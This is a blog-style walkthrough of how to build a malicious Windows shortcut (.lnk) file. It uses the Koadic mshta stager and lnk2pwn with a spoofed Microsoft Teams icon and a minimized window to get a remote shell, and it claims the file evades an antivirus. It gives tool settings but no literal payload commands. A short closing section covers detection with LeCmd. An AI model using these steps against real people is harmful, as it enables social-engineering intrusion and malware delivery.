Pwning with shortcut : Abusing windows lnk feature to get foothold

In windows lnk is an extension of shortcut files. Windows create a shortcut which points to an actual file and run that application. In this post we will see how threat actor can abuse windows lnk feature and do some social engineering trick to make someone run a malicious application

What this post is about

This post is a series of social engineering attack where an attacker can use some malicious shortcut file with a spoof extension using Unicode character and a fake image. Shortcut file can be used with living off the land techniques which can help to bypass defender.

What this post is not about

This post will only show initial access part where an attacker gain access to the victim machine using very basic techniques. The next post will show evading most antivirus and detection .

Preparing the Attack

For this attack I am going to use Koadic, a COM based command and control framework. Koadic can deliver the payload directly in memory from Stage0 using some living off the land technique which can help us to bypass basic detection.

I am going to select mshta attack technique for stager by typing use stager/js/mshta

Next I am setting the ENDPOINT to trusted which will be the payload name

Now running the payload

Our attacker machine is ready to send the payload now

Preparing malicious shortcut file

You can create a malicious shortcut file manually but to make thing a little automated I am going to use lnk2pwn

After running ln2pwn this is what we get on screen

Download the .ico file which you want for spoofing the icon as I am using Microsoft teams app icon for this. Or you can install the program and load the icon from it’s installed location

Now in lnk2pwn use the following setting:

1. Put your malicious command here, try to use LOLBIN method

2. Set the location of your ico file. Make sure you are spoofing icon from installed software (for example choose the icon from program files, system32 directory)otherwise the icon will not load on the victim system. I am using downloaded icon just for the demo.

3. Select the minimize option as this will run the cmd prompt minimized.

4. Select your fake extension , I am leaving it blank because I want to make it a lnk file.

5. Select generate button and set your location to save the malicious shortcut file

Our shortcut file is ready to deliver

I tested this shortcut file on our victim machine with an updated version of Quick Heal and it was not able to detect the file.

At last I executed the file and it run the mshta command inside the minimized cmd prompt

And I got the shell on my kali machine

Analyzing malicious lnk file

You can use exiftool to detect malicious lnk file but LeCmd by EricZimmerman does a better job to parse it as shown below.

Final words

This was very basic method to abuse lnk feature in my next post we will see how this method can help an attacker to bypass some popular AVs